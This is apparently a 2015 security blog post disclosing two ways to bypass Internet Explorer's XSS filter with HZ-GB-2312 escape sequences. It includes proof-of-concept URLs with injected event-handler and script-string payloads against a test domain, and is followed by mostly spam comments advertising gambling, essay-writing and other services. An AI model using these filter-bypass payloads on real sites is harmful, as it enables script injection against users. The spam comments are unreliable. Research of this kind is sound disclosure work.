Tuesday, September 29, 2015

Bypassing IE's XSS Filter with HZ-GB-2312 escape sequence

I would like to share an IE XSS Filter bypass that uses the escape sequences of the HZ-GB-2312 encoding.

To use this vector, the target page's Content-Type header must not specify a charset.

Bypass 1

PoC:
http://vulnerabledoma.in/char_test?body=%3Cx~%0Aonmouseover=alert(1)%3EAAA
No user interaction version:
http://vulnerabledoma.in/char_test?body=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a

"~[0x0A]" (a tilde followed by a line feed) is an HZ-GB-2312 escape sequence. It seems that the XSS filter makes an exception for "~[0x0A]".

If the Content-Type header has a proper charset, it does not work:
http://vulnerabledoma.in/char_test?charset=utf-8&body=%3Cx~%0Aonmouseover=alert(1)%3EAAA

On the other hand, if the proper charset is given only in a meta tag, it still works:
http://vulnerabledoma.in/xssable?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a

Bypass 2

"~{" is also an HZ-GB-2312 escape sequence, and we can use it for a bypass as well: it lets us call a same-origin method from an injection into a string literal.

The PoC is here:
http://l0.cm/xssfilter_hz_poc.html

Click the "go" button; you can confirm that the element.click method is called.

"click" is called from the following code:
http://vulnerabledoma.in/xss_js?q=%22%3B~{valueOf:opener.button.click}//
<script>var q="";~{valueOf:opener.button.click}//"</script>

You can also use "toString":
http://vulnerabledoma.in/xss_js?q=%22%3B~{toString:opener.button.click}//

<script>var q="";~{toString:opener.button.click}//"</script>

That's all. See you next month!

9 comments:

  1. Wow! This can be one of the most useful blogs we have ever come across on this subject. 먹튀검증

  2. Hey! There you are! Our service https://expertpaperwriter.com/papernow-org-review/ focus on keeping our prices low, but unlike other academic writing services online, we never sacrifice quality for the sake of price. We thrive on service orientation; our mission is to increase customer loyalty by providing nonparallel services and after sales support.

  3. There are several methods for avoiding XSS filters, but the ideal is to employ the best research data collection service that is particularly built to avoid these filters. You may be confident that your study data will be collected without incident if you choose a service like this.

  4. A participant also could play colors, odd 토토사이트 and even numbers, amongst others. A bet on a single number pays 35 to 1, together with the zero and 00. Bets on pink or black, odd and even pay 1 for 1, and even cash. In the 1960s and early Seventies, Richard Jarecki won about $1.2 million at dozens of European casinos. He claimed that he was using a mathematical system designed on a powerful pc. In actuality, he simply noticed greater than 10,000 spins of every roulette wheel to find out flaws within the wheels.

  5. One of the best things about refurbished gadgets is that they undergo rigorous testing and quality checks, so you can trust that you're getting a reliable product. It's a win-win for your wallet and peace of mind. https://smartimobile.com

  6. By leveraging these strategies, developers can enhance the effectiveness of their web security measures. Stay ahead of potential vulnerabilities, especially in sensitive sectors like the saudi medical cloud, by understanding and mitigating such risks effectively.

  7. Medical credit card processing refers to the system through which healthcare providers accept and manage credit card payments from patients for medical services. This service ensures a seamless transaction process, enhancing convenience for patients and streamlining payment collections for providers. Specialized medical credit card processing solutions often include features like compliance with healthcare regulations (such as HIPAA), secure data handling, and the ability to manage large transaction volumes.

    These systems may also offer financing options, allowing patients to pay in installments, thereby making healthcare more accessible. By adopting these services, medical practices can improve cash flow, reduce billing complexities, and enhance overall patient satisfaction.

  8. Good post! This is a great blog that I'll be sure to visit many more times this year. We appreciate the article. connections game

  9. Bypassing IE's XSS filter with the HZ-GB-2312 escape sequence highlights the importance of robust security measures in software environments. For businesses, utilizing microsoft 365 consulting services can be invaluable in fortifying their systems against such vulnerabilities. Microsoft 365 consulting provides expert guidance on implementing advanced security protocols.
